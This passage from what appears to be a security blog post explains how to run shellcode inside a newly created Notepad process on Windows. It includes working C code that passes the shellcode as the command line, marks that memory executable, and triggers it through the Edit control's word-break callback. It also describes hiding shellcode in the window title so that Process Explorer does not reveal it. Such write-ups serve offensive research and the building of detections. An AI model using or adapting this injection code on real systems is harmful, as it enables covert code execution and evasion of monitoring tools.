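    return (size_t)s->Length / sizeof(uint16_t);
}

/* Describe a NUL-terminated UTF-16 buffer the way UNICODE_STRING would. */
mock_unicode_string ustr_from_utf16(const uint16_t *buf) {
    mock_unicode_string s;
    size_t n = 0;

    assert(buf != NULL);
    while (buf[n] != 0) n++;        /* count code units up to the terminator */

    s.Length        = (uint16_t)(n * sizeof(uint16_t));
    s.MaximumLength = (uint16_t)((n + 1) * sizeof(uint16_t));
    s.Buffer        = buf;
    return s;
}
```

    For a seven-character string such as "notepad", Length is 14 and the character count is 7, which is why a byte-sized API can take the Length value directly.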
    

    Figure 2 illustrates what Process Explorer might show for the new process. See cmd_inject.c for more details.

    Figure 2. Command line of new process containing shellcode.

    #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"
    
    void cmd_inject(PWCHAR cmd) {
        STARTUPINFO         si;
        PROCESS_INFORMATION pi;
        WCHAR               path[MAX_PATH]={0};
        DWORD               rva, old, len;
        PVOID               cmdline;
        HWND                npw, ecw;
    
        ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
        
        // create a new process using shellcode as command line
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        
        CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
          FALSE, 0, NULL, NULL, &si, &pi);
         
        // wait for process to initialize
        // if you don't wait, there can be a race condition
        // reading the correct command line from new process  
        WaitForInputIdle(pi.hProcess, INFINITE);
        
        // the command to execute is just pasted into the notepad
        // edit control.
        npw = FindWindow(L"Notepad", NULL);
        ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
        SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
        
        // get the address of command line in new process
        // which contains our shellcode
        cmdline = get_cmdline(pi.hProcess, &len);
        
        // set the address to RWX
        VirtualProtectEx(pi.hProcess, cmdline, 
          len, PAGE_EXECUTE_READWRITE, &old);
        
        // execute shellcode
        SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)cmdline);
        SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
        SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
        
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    

    5. Window Title

    IMHO, this is the best of the three because the lpTitle field of STARTUPINFO only applies to console processes. If a GUI program like Notepad is launched, Process Explorer doesn’t show any unusual characters in the process properties. Set lpTitle to the shellcode and CreateProcessW will copy it into the new process. As with the other two methods, the address can be read via the PEB.

        // create a new process using shellcode as window title
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        si.lpTitle     = (PWCHAR)WINEXEC;
    

    6. Runtime Data

    Two fields (cbReserved2 and lpReserved2) in the STARTUPINFO structure are, according to Microsoft, “Reserved for use by the C Run-time” and must be NULL or zero prior to calling CreateProcess. Because cbReserved2 is a 16-bit WORD, the maximum amount of data that can be transferred into a new process this way is 65,535 bytes, but my experiment with it resulted in the new process failing to execute. The fault was in ucrtbase.dll, likely because lpReserved2 didn’t point to the data it expected.

    While it didn’t work for me, that’s not to say it can’t work with some additional tweaking.
